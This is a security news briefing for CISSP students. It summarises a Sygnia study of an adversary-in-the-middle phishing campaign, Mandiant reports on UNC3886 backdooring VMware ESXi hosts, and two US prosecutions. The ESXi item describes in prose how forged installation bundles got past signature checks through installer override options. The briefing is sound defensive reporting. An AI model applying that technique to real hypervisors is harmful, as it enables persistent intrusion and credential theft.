Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
More Analysis of BEC Attacks
Over the last couple of days, we have covered business email compromise attacks, and today provides yet another example. This time, Israeli incident response firm Sygnia provides an analysis of a BEC campaign affecting dozens of victim organizations world-wide.
High-level description of the attack chain (image credit: Sygnia)
Their analysis, produced using an array of threat intelligence tools, shows the following steps:
- A phishing email was sent to one of Sygnia's client’s employees, originating from a legitimate mailbox of an external company, assumed to be previously compromised.
- The phishing email included a link leading to a file sharing request page, hosted on an assumed to be compromised domain, with a URL path associated with the email sender’s company.
- Upon clicking the link, the victim was referred to an ‘I'm not a robot’ check hosted by Cloudflare, which acts as an anti-tracing method.
- After passing the check, the victim was referred to a fraudulent Office365 authentication page, generated by a phishing kit.
- After the victim entered his credentials, the phishing kit initiated an ‘Adversary in The Middle’ (AiTM) attack, forwarding the client authentication and MFA challenge to a legitimate Microsoft authentication service while stealing the acquired session token as well as the credentials to enable access to the account.
- The threat actor then logged into the victim’s account using the stolen token and added a new MFA device to gain persistent access.
- Once persistent access was achieved, the threat actor created a new file sharing request site related to the new victim’s company and compromised account.
- In addition to exfiltration of sensitive data from the compromised account, the threat actor used this access to send new phishing emails containing the new malicious link to dozens of the client’s employees as well as to additional targeted organizations.
These tactics are similar to those analyzed by MicrosoftThreat Intelligence, which we reported on yesterday. The value of Cygnia's report is its detailed demonstration of analytic pivoting and the variety of tools used. The implications for likely victims are clear: use of multi-factor authentication is not much of a defense when poorly-trained and unaware users can fall victim to Man-in-the-Middle attacks.
Sadon, Amir, Dor Fenigshtein, Shani Adir Nissim, Amnon Kushni and Ori Porag, Case Study: cracking a global Adversary-In-The-Middle campaign using a threat intelligence toolkit, blog post, 13 June 2023. Available online at https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit.
Chinese APT Exploits ESXi 0day
Last year, Mandiant reported on a new technique which was being used by UNC3886, a possibly Chinese cyber-espionage threat actor (the UNC designation means that the actor was as yet uncategorized). The technique involved the creation of malicious vSphere Installation Bundles (VIB's) and duping the ESXi server into installing them by faking the acceptance level of the bundle.
By default, a ESXi host will only install bundles with an acceptance level of PartnerSupported or above; in this case, the attacker had modified the bundle's XML descriptor, changing the acceptance-level field from Community-Supported to PartnerSupported, and while this meant that the digital signature of the bundle would not validate, the attacker simply removed the signature and used the --force or --no-sig-check options on the installation command to get the bundle installed anyway.
This technique was used to install backdoors on the ESXi servers, executing commands on guest machines through the vmtoolsd.exe process, from which information, including credentials, could then be exfiltrated.
Now UNC3886 is back, with additional techniques. Their primary goal seems to be to evade detection; this may be why they target VMware ESXi hosts in the first place, since they commonly do not support EDR products. The evasion techniques mployed by this actor include:
- Harvesting credentials for service accounts from a vCenter Server for all connected ESXi hosts from the embedded vPostgreSQL server built into vCenter Server Appliance
- Exploiting a zero-day vulnerability (CVE-2023-20867) that enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs
- Deploying backdoors on ESXi hosts using an alternative socket address family, VMCI, for lateral movement and continued persistence. This address family enabled direct reconnection from any guest VM to the compromised ESXi host’s backdoor regardless of network segmentation or firewall rules in place.
- Continuing to tamper with and disable logging services on impacted systems, presenting additional challenges to investigating UNC3886 in a compromised environment.
An interesting point about this report is IOC's reported: following previous Mandiant reports, UNC3886 has been very quick to change the atomic IOC's of its tools, such as file names and digests. Accordingly, this time Mandiant has focused on the tactics and methodologies used by the group - in effect, behvioural IOC's.
Marvi, Alexander, Jeremy Koppen, Tufail Ahmed, Jonathan Lepore, Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors, blog post, 28 September 2022. Available online at https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence.
Marvi, Alexander, Brad Slaybaugh, Ron Craft and Rufus Brown, VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors, blog post, 13 June 2023. Available online at https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass.
DoJ Scores Two Wins
The US Attorney's Office, Southern District of New York, has scored a couple of small victories in the last few days.
First, along with the Northen District of Califironia and the DoJ's Criminal Division, it laid charges against two Russian nationals for their part in the 2011 theft of cryptocurrency from wallets on the Mt. Gox exchange, which ultimately led to its collapse in 2014. Alexey Bilyuchenko, 43, and Aleksandr Verner, 29, are accused of conspiring to launder approximately 647,000 bitcoins from the 2011 hack.
Bilyuchenko is separately charged in the Northern District of California with conspiring with Alexander Vinnik to operate the illicit cryptocurrency exchange BTC-e from 2011 to 2017, laundering funds for cybercriminals worldwide.
Of course, indictment is one thing; both Bilyuchenko and Verner remain at large, probably in Russia, making their appearance in court unlikely.
In a separate case, Mihai, Ionut Paunescu, a.k.a "Virus", was sentenced to three years in prison for conspiracy to commit computer intrusion in connection with running a “bulletproof hosting” service that enabled cybercriminals to distribute the Gozi Virus, the Zeus Trojan, the SpyEye Trojan, and the BlackEnergy banking trojans. Paunesco had also been involved in DDoS attacks and spamming, and had pleaded guilty back in February.
Biase, Nicholas, Russian Nationals Charged With Hacking One Cryptocurrency Exchange And Illicitly Operating Another, press release, 9 June 2023. Available online at https://www.justice.gov/usao-sdny/pr/russian-nationals-charged-hacking-one-cryptocurrency-exchange-and-illicitly-operating.
Biase, Nicholas, Romanian National Who Operated “Bulletproof Hosting” Service That Facilitated The Distribution Of Destructive Malware Sentenced To Three Years In Prison, press release, 12 June 2023. Available online at https://www.justice.gov/usao-sdny/pr/romanian-national-who-operated-bulletproof-hosting-service-facilitated-distribution.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.